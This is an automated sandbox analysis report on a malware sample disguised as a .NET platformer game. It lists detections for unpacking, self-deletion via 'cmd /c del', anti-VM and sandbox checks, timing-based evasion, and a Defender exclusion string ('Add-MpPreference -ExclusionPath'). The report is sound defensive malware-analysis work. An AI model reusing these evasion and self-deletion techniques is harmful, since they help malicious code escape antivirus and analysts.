          Source: Binary string: cscript.pdb source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: CtTYTpaAKA.exe, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.CtTYTpaAKA.exe.610000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.2.CtTYTpaAKA.exe.610000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.CtTYTpaAKA.exe.540000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.3.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.2.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.9.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.5.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.7.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041B832 push eax; ret 5_2_0041B838
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FFD0D1 push ecx; ret 5_2_00FFD0E4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0478D0D1 push ecx; ret 10_2_0478D0E4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016B832 push eax; ret 10_2_0016B838
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016B83B push eax; ret 10_2_0016B8A2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016B89C push eax; ret 10_2_0016B8A2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016B7E5 push eax; ret 10_2_0016B838

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'Jump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.29ed0e0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CtTYTpaAKA.exe PID: 7140, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000158614 second address: 000000000015861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000001589AE second address: 00000000001589B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe TID: 7144Thread sleep time: -35433s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe TID: 3212Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5684Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6812Thread sleep time: -44000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004088E0 rdtsc 5_2_004088E0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeThread delayed: delay time: 35433Jump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000007.00000000.324192156.00000000089CC000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000000.338668394.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.320927407.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000007.00000000.301421655.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.338668394.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000007.00000000.301421655.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000007.00000000.338668394.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004088E0 rdtsc 5_2_004088E0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA58EC mov eax, dword ptr fs:[00000030h]5_2_00FA58EC
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01078D34 mov eax, dword ptr fs:[00000030h]5_2_01078D34
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0102A537 mov eax, dword ptr fs:[00000030h]5_2_0102A537
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106E539 mov eax, dword ptr fs:[00000030h]5_2_0106E539
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDF0BF mov ecx, dword ptr fs:[00000030h]5_2_00FDF0BF
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDF0BF mov eax, dword ptr fs:[00000030h]5_2_00FDF0BF
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDF0BF mov eax, dword ptr fs:[00000030h]5_2_00FDF0BF
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01023540 mov eax, dword ptr fs:[00000030h]5_2_01023540
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE90AF mov eax, dword ptr fs:[00000030h]5_2_00FE90AF
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]5_2_00FD20A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]5_2_00FD20A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]5_2_00FD20A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]5_2_00FD20A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]5_2_00FD20A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]5_2_00FD20A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FB849B mov eax, dword ptr fs:[00000030h]5_2_00FB849B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA9080 mov eax, dword ptr fs:[00000030h]5_2_00FA9080
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC746D mov eax, dword ptr fs:[00000030h]5_2_00FC746D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010269A6 mov eax, dword ptr fs:[00000030h]5_2_010269A6
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010705AC mov eax, dword ptr fs:[00000030h]5_2_010705AC
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010705AC mov eax, dword ptr fs:[00000030h]5_2_010705AC
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC0050 mov eax, dword ptr fs:[00000030h]5_2_00FC0050
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FC0050 mov eax, dword ptr fs:[00000030h]5_2_00FC0050
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA44B mov eax, dword ptr fs:[00000030h]5_2_00FDA44B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010251BE mov eax, dword ptr fs:[00000030h]5_2_010251BE
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010251BE mov eax, dword ptr fs:[00000030h]5_2_010251BE
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010251BE mov eax, dword ptr fs:[00000030h]5_2_010251BE
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010251BE mov eax, dword ptr fs:[00000030h]5_2_010251BE
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]5_2_01026DC9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]5_2_01026DC9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]5_2_01026DC9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov ecx, dword ptr fs:[00000030h]5_2_01026DC9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]5_2_01026DC9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]5_2_01026DC9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]5_2_00FD002D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]5_2_00FD002D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]5_2_00FD002D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]5_2_00FD002D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]5_2_00FD002D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBB02A mov eax, dword ptr fs:[00000030h]5_2_00FBB02A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBB02A mov eax, dword ptr fs:[00000030h]5_2_00FBB02A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBB02A mov eax, dword ptr fs:[00000030h]5_2_00FBB02A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBB02A mov eax, dword ptr fs:[00000030h]5_2_00FBB02A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDBC2C mov eax, dword ptr fs:[00000030h]5_2_00FDBC2C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106FDE2 mov eax, dword ptr fs:[00000030h]5_2_0106FDE2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106FDE2 mov eax, dword ptr fs:[00000030h]5_2_0106FDE2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106FDE2 mov eax, dword ptr fs:[00000030h]5_2_0106FDE2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106FDE2 mov eax, dword ptr fs:[00000030h]5_2_0106FDE2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010341E8 mov eax, dword ptr fs:[00000030h]5_2_010341E8
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01058DF1 mov eax, dword ptr fs:[00000030h]5_2_01058DF1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026C0A mov eax, dword ptr fs:[00000030h]5_2_01026C0A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026C0A mov eax, dword ptr fs:[00000030h]5_2_01026C0A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026C0A mov eax, dword ptr fs:[00000030h]5_2_01026C0A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026C0A mov eax, dword ptr fs:[00000030h]5_2_01026C0A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107740D mov eax, dword ptr fs:[00000030h]5_2_0107740D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107740D mov eax, dword ptr fs:[00000030h]5_2_0107740D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0107740D mov eax, dword ptr fs:[00000030h]5_2_0107740D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01074015 mov eax, dword ptr fs:[00000030h]5_2_01074015
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01074015 mov eax, dword ptr fs:[00000030h]5_2_01074015
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027016 mov eax, dword ptr fs:[00000030h]5_2_01027016
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027016 mov eax, dword ptr fs:[00000030h]5_2_01027016
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01027016 mov eax, dword ptr fs:[00000030h]5_2_01027016
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]5_2_00FAB1E1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]5_2_00FAB1E1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB1E1 mov eax, dword ptr fs:[00000030h]5_2_00FAB1E1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBD5E0 mov eax, dword ptr fs:[00000030h]5_2_00FBD5E0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBD5E0 mov eax, dword ptr fs:[00000030h]5_2_00FBD5E0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]5_2_00FD1DB5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]5_2_00FD1DB5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]5_2_00FD1DB5
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103C450 mov eax, dword ptr fs:[00000030h]5_2_0103C450
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0103C450 mov eax, dword ptr fs:[00000030h]5_2_0103C450
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD35A1 mov eax, dword ptr fs:[00000030h]5_2_00FD35A1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD61A0 mov eax, dword ptr fs:[00000030h]5_2_00FD61A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD61A0 mov eax, dword ptr fs:[00000030h]5_2_00FD61A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDFD9B mov eax, dword ptr fs:[00000030h]5_2_00FDFD9B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDFD9B mov eax, dword ptr fs:[00000030h]5_2_00FDFD9B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2990 mov eax, dword ptr fs:[00000030h]5_2_00FD2990
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]5_2_00FA2D8A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]5_2_00FA2D8A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]5_2_00FA2D8A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]5_2_00FA2D8A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FA2D8A mov eax, dword ptr fs:[00000030h]5_2_00FA2D8A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01071074 mov eax, dword ptr fs:[00000030h]5_2_01071074
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01062073 mov eax, dword ptr fs:[00000030h]5_2_01062073
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDA185 mov eax, dword ptr fs:[00000030h]5_2_00FDA185
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2581 mov eax, dword ptr fs:[00000030h]5_2_00FD2581
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2581 mov eax, dword ptr fs:[00000030h]5_2_00FD2581
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2581 mov eax, dword ptr fs:[00000030h]5_2_00FD2581
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD2581 mov eax, dword ptr fs:[00000030h]5_2_00FD2581
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCC182 mov eax, dword ptr fs:[00000030h]5_2_00FCC182
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01023884 mov eax, dword ptr fs:[00000030h]5_2_01023884
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01023884 mov eax, dword ptr fs:[00000030h]5_2_01023884
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB171 mov eax, dword ptr fs:[00000030h]5_2_00FAB171
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FAB171 mov eax, dword ptr fs:[00000030h]5_2_00FAB171
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCC577 mov eax, dword ptr fs:[00000030h]5_2_00FCC577
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FCC577 mov eax, dword ptr fs:[00000030h]5_2_00FCC577
